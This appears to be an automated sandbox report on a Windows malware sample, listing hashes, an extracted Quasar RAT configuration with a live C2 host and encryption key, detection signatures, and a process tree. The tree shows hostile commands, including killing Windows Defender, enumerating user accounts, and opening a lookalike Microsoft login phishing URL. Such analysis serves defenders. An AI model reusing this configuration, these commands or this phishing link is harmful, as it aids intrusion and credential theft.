Resubmissions

17-01-2025 11:40

250117-ns1f3svrfx 10

26-12-2024 15:01

241226-sec6vayjgx 10

27-09-2024 10:28

240927-mh3m1sxgrm 10

18-08-2024 19:49

240818-yjmtqsthkm 10

18-08-2024 14:30

240818-rvdxmsxgjg 10

15-08-2024 23:29

240815-3g3jmawdnq 10

15-08-2024 23:15

240815-28syts1brg 10

Analysis

  • max time kernel
    320s
  • max time network
    333s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-de
  • resource tags

    arch:x64arch:x86image:win11-20241007-delocale:de-deos:windows11-21h2-x64systemwindows
  • submitted
    26-12-2024 15:01

General

  • Target

    vir.exe

  • Size

    336.1MB

  • MD5

    bc82ea785da1180a8a964b3e54ad106c

  • SHA1

    4c1952ce778455af8ed10dca7b9f77d7815e8d0a

  • SHA256

    c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b

  • SHA512

    62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b

  • SSDEEP

    6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Detect Umbral payload 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Djvu family
  • MassLogger

    Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.

  • MassLogger Main payload 2 IoCs
  • Masslogger family
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Njrat family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Windows security bypass 2 TTPs 7 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Disables RegEdit via registry modification 1 IoCs
  • Drops file in Drivers directory 6 IoCs
  • Manipulates Digital Signatures 1 TTPs 1 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 5 IoCs
  • .NET Reactor proctector 35 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 50 IoCs
  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 6 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • AutoIT Executable 4 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 44 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 23 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 19 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 22 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 18 IoCs
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 51 IoCs
  • Suspicious use of SetWindowsHookEx 55 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\vir.exe
    "C:\Users\Admin\AppData\Local\Temp\vir.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4852
    • C:\Users\Admin\AppData\Local\Temp\73cbc365-eb55-4546-bd03-0fbdadb0d125\ProgressBarSplash.exe
      "C:\Users\Admin\AppData\Local\Temp\73cbc365-eb55-4546-bd03-0fbdadb0d125\ProgressBarSplash.exe" -unpacking
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1232
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\!main.cmd" "
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3044
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K spread.cmd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5108
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 1 C:\Users\Admin\Desktop
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:4448
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 2 C:\Users\Admin\Desktop
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:1916
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy 3 C:\Users\Admin\
          4⤵
          • Enumerates system info in registry
          PID:4980
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K doxx.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:968
        • C:\Windows\SysWOW64\ipconfig.exe
          ipconfig
          4⤵
          • System Location Discovery: System Language Discovery
          • Gathers network information
          PID:2628
        • C:\Windows\SysWOW64\net.exe
          net accounts
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4648
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 accounts
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3300
        • C:\Windows\SysWOW64\net.exe
          net user
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3856
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user
            5⤵
              PID:4124
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist /apps /v /fo table
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2324
        • C:\Windows\SysWOW64\PING.EXE
          ping google.com -t -n 1 -s 4 -4
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2944
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im WindowsDefender.exe
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1224
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K handler.cmd
          3⤵
            PID:2980
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ2
            3⤵
            • Manipulates Digital Signatures
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:4864
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda2423cb8,0x7ffda2423cc8,0x7ffda2423cd8
              4⤵
                PID:1112
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
                4⤵
                  PID:2364
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1976
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
                  4⤵
                    PID:3888
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3096 /prefetch:1
                    4⤵
                      PID:1724
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
                      4⤵
                        PID:1516
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
                        4⤵
                          PID:3748
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1
                          4⤵
                            PID:4492
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
                            4⤵
                              PID:1940
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
                              4⤵
                                PID:1476
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
                                4⤵
                                  PID:1892
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
                                  4⤵
                                    PID:952
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=6360 /prefetch:8
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2276
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
                                    4⤵
                                      PID:4452
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
                                      4⤵
                                        PID:5196
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=1688 /prefetch:8
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1036
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
                                        4⤵
                                          PID:3396
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
                                          4⤵
                                            PID:5140
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
                                            4⤵
                                              PID:5252
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
                                              4⤵
                                                PID:4940
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
                                                4⤵
                                                  PID:3964
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1276 /prefetch:1
                                                  4⤵
                                                    PID:2312
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6092 /prefetch:2
                                                    4⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:6580
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
                                                    4⤵
                                                      PID:6516
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
                                                      4⤵
                                                        PID:6596
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:1
                                                        4⤵
                                                          PID:6632
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1
                                                          4⤵
                                                            PID:6356
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6784 /prefetch:1
                                                            4⤵
                                                              PID:6000
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --service-sandbox-type=audio --mojo-platform-channel-handle=7624 /prefetch:8
                                                              4⤵
                                                                PID:4880
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
                                                                4⤵
                                                                  PID:6100
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
                                                                  4⤵
                                                                    PID:1420
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7452 /prefetch:1
                                                                    4⤵
                                                                      PID:2352
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1
                                                                      4⤵
                                                                        PID:1720
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,17888292816098142736,14186091619947786561,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
